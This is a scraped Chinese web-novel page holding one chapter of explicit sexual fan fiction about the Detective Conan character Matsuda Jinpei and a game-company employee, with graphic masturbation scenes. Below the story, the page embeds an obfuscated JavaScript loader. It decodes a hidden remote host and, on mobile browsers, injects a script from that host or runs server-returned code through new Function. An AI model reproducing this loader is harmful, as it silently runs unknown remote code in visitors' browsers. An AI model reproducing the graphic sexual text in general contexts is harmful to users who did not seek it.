烽火小说网

阅读记录  |   用户书架
上一章
目录 | 设置
下一章

再遇松田阵平,洗手间自慰被撞到(微微H)(1 / 1)

加入书签 | 推荐本书 | 问题反馈 |

再遇松田阵平,洗手间自慰被撞到(微微H)



游戏盛典举办,业内标杆X公司也被邀请参加官方休闲酒会,宴会厅多是年轻的红男绿女,觥筹交错,一派热闹景象。

快看,我就说花田身材辣吧。数值策划师山本用手肘捅了捅隔壁的同伴,发现没回应转过头去却发现是不知何时过来的朝日奈组长。

朝日奈枣皱起眉,你平时上班都在想什么?

呃当我什么都没说。山本讪笑,拿起点心就闪。笑死都是男人谁还不懂啊,上班时就看得出组长对花田态度不一般了。

朝日奈枣看向远处的倩影,有些口干舌燥地拿起酒杯,今天的晴子很美,缎面材质的吊带包臀裙衬得她的身材更加饱满有立体感,少见的红唇浓妆显得她成熟明艳。总觉得她最近变了很多,朝日奈枣有些苦涩地想。

花田晴子对男士这边的议论没有察觉,窝在角落里自顾自地享用点心避免走动。因为裙子的款式设计,为了追求无痕效果她穿了丁字裤,结果真的穿久了走起来就难受……

当初不应该冲动买这裙子的,可是导购真的夸得她心飘飘欸,哪个女人忍得住!啊啊盛典都结束了怎么他们还在继续酒会,公司难道没有人带头先走吗?

花田晴子抬头环视,居然、真的、一个都没走。

音乐这时换成了柔和的舞曲,成年人通达情趣地搭肩搂腰缓缓舞动。花田晴子无语地想,在场几乎都是忙起来蓬头垢面的游戏界人士还搞这套。放下酒杯,晴子就往宴会厅外面溜提前躲开邀请。

嗯~磨到了。晴子红着脸往洗手间走去,下次,下次她绝对不会再穿这个了!

正要经过走廊拐角,身后哒哒地传来跑步声,一个熊孩子在背后撞得花田晴子往前摔去,糟了!——咦?不是想象中的地板。

双手下意识地摸索,这弹性的胸肌,加上鼻尖嗅到的烟草味,抬头一看,果然是个男人,而且还是个很帅的男人。

好巧呀,松田警官。花田晴子惊喜地打招呼,这不是上次那个帮她拦住抢劫犯气场两米八的酷警官吗。

松田阵平双手礼貌地扶住女人的腰,清淡好闻的香水味挡不住地侵入,身体微微后仰避开亲密的胸膛接触,从他的视角可以看到女人领口下的深沟诱惑。

微红着脸,他松开手,疑惑问道:你是?

嗨呀,我就是之前遇到抢劫犯那个人呀,你还帮我了拿了内……咳,内衣的。花田晴子反应过来,收回按在男人胸膛的手,有些不知哪安放好的干脆背在身后,反而无意中露出像是挺胸的姿态。

……我记起来了。松田阵平尴尬地轻咳一声,移开视线,原来是她,不得不说形象变化有点大。

我叫花田晴子哦,警官先生这次一定要记好了。晴子笑眯眯地说,突然她小声地问道:松田警官来这里难道是有什么任务吗?

别想太多,碰巧而已。被丰富想象力逗乐的松田轻笑,形象突然柔和变得有些不羁蛊人。

晴子被酷哥一笑迷了眼,认真地说:松田警官你真应该多笑笑。多好看呀。

松田挑眉,听到这话他反而故意逗人一样的收敛笑容变成面无表情,知道了。说完他走到侧边让路,那先不打扰了。这个方向,她应该是想去洗手间吧?

好的,有缘再会。花田晴子点头示意,但一迈开步子就忍不住嘤咛出声嗯~天,卡住了。

身为拆弹王牌的松田阵平耳力很好,他没有漏过刚刚女人怪异的呻吟,皱起眉:花田小姐?

没,没事。晴子面色酡红,回头勉强地笑着,而后试图快步离开。侧面开叉的礼裙设计令穿着的人走动时显得更有韵味风情,也尽情展现出女性完美的腿型。

不长的一程路,晴子走得面色潮红,走得越快,那和细绳一样的小布片就勒在xue缝磨得越剧烈。腿跟发颤,花心酸软,yin液直冒,浸透的布绳兜不住yin水,顺着流下在大腿划出yin靡的痕迹被裙子挡住。

晴子咬着唇,羞涩地想藏起,身后松田警官盯着的视线格外烫人,他、应该没有看出什么不对劲吧?

到了!晴子快速推开门闪进去,很好,里面没人。她如释重负地呼气,靠在了门上。缓了缓走近洗手池洗手,她走进一个隔间。

毫不优雅地大张开腿坐下,可怜的xiaoxue总算得以歇息。嗯~太失策了。晴子从小包里拿出手机,斟酌着字眼发短信给朝日奈枣说自己有事情得先离开。照理她不应该在职场做这种失礼的事的,可是她要是现在这样子回宴会厅一定更糟……

很快就有回复。【好的。好好休息。】

好冷淡,晴子皱起眉,もういい!结束了,都结束了!她有些气地把手机放回去,彻底放松下来。

撩起裙子,黑色的蕾丝内裤显现出来,原本勉强挡住花xue的小布片湿泞得卡进yinchun的缝里,臀部的布绳则深陷进丰满的臀rou。彻底湿透的丁字裤紧紧挤压着xiaoxue,像绳子一样从前往后不留缝隙地勒住敏感的蒂珠和xue口。

嗯啊~晴子仰起头眼睛湿润,手指隔着薄薄蕾丝布绳按在那凸起的蒂珠,时轻时重地打圈捏揉。好舒服嗯~每当手指用力就感觉布料勒的更深,像是要陷进吐水的xue口一样。

在公共场合被异物侵犯的紧张感让女人更加敏感。下体发酸的厉害,原本还能分神留意洗手间是否有人进入的动静的她,玩到后面只能把精神集中在不要发出声音了。

湿哒哒黏糊糊的,布绳粗糙、紧密地贴紧娇嫩的阴蒂,尖锐鲜明的快感让晴子大脑发麻,[啊、哈……不可以,好yin荡嗯啊~呜啊好湿、好痒嗯……]晴子将布绳往xue口挤压转圈,想要把它塞进去一样。这种粗糙的摩擦快感是和手指截然不同的刺激,[saoxue好想要……有谁可以塞进来、嗯啊、哈……]

花田晴子紧紧咬住下嘴唇,死死的压抑住呻吟,突然她费劲地抬起屁股,双手一前一后地扯住细绳,竟是自己快速摩擦起小逼来!

呀昂!——粗暴的快感如此强烈让人上瘾,yin水和失禁一样兴奋地泉涌,滴答滴答地落下。细绳针对着突出的阴蒂狠狠折磨,原本应该紧闭的肥厚蚌rou也被隔开,磨得内壁又痛又爽。噫啊……快点、插进来saorouxue饥渴地收缩着,被丁字裤弄得红肿发痒,湿滑软烂。

晴子眼角含泪,抖着屁股快要达到高潮,沉浸在情欲中的她没有听到洗手间被推开和急促的跑步声,下一刻上了锁的外开隔间门被暴力打开!

呃啊!——花田晴子被这剧变吓得直接腰软坐下,布绳顿时勒紧张开的xue口,她抽搐着达到高潮,yin水喷溅停不下来。

呀!!出去!她近乎崩溃地尖叫捂住脸,松田阵平回过神来把被按在地下的犯人打晕拽走,把门推回去。大脑却不可自抑地想着刚刚看到的yin靡一幕:女人大张着腿,白嫩的腿rou在灯光下晃人得厉害,黑色的布绳色情地陷在艳红饱满的rou唇,紧缚着花核和xue口,被撑开的xue口一股一股汁液肆流——花田小姐,这么yin乱的吗?

*

隔间内晴子难堪又后怕地哭出声来,安全感被这个意外彻底打破。良久,她才迟疑着推开门,对镜整理好妆容。可是裙子湿了……没办法了,尽量躲着人见机行事吧。她皱着眉忧虑地离开,却在洗手间外看到了松田。

对不起!刚刚真的是意外。松田阵平严肃地道歉,留意到晴子哭得红肿的眼睛,他更感到抱歉。低下头,看到她裙子不自然的湿渍,他立刻解开外套递给晴子,你围着吧。

刚刚犯人闯进了女洗手间,只有我一个追捕,所以……只能说,真的都是意外,犯人原本估计是慌乱地想挟持里面的女性没想到却。

花田晴子摇摇头,情绪过后她想得通正是有警察在她才安全,理解地说:不怪你,是犯人的错。

两个人并行走着,松田主动说要送她回去,毕竟她现在样子……也不太方便。车内的气氛尴尬到凝固,松田调到音乐电台播曲。晴子叹气,主动搭话询问。没想到那个人竟然是在用餐时下毒,被发现后还企图逃跑。

同情地看着松田阵平:你们警察的生活可真是、丰富刺激。聚个会都能差点被毒害。

松田轻笑,习惯了。

——听起来更可怕了。很快到达晴子公寓楼下,她转过头语气平和地问:可以给个联系方式吗?衣服我到时洗好了还你。

没有开灯昏暗的车内松田没有特意观察花田晴子的表情,递出名片。下一刻花田吻上他侧脸,谢了,晚安。打开车门没有回头地离开。

*

合租公寓内,萩原研二兴奋地打趣松田:小阵平!你终于情花开了吗?哇,好痴缠噢。

什么?

chu~萩原暧昧地点了点自己左脸。

难道说?!松田阵平跑进浴室一看镜子,果然,醒目的口红印印在了脸颊上,难怪刚刚回来时路过的人表情古怪。松田无奈地笑,想起来初见的场景,这幼稚的报复倒确实像是花田的风格。



function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2tqaGRiaGpzYmprZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间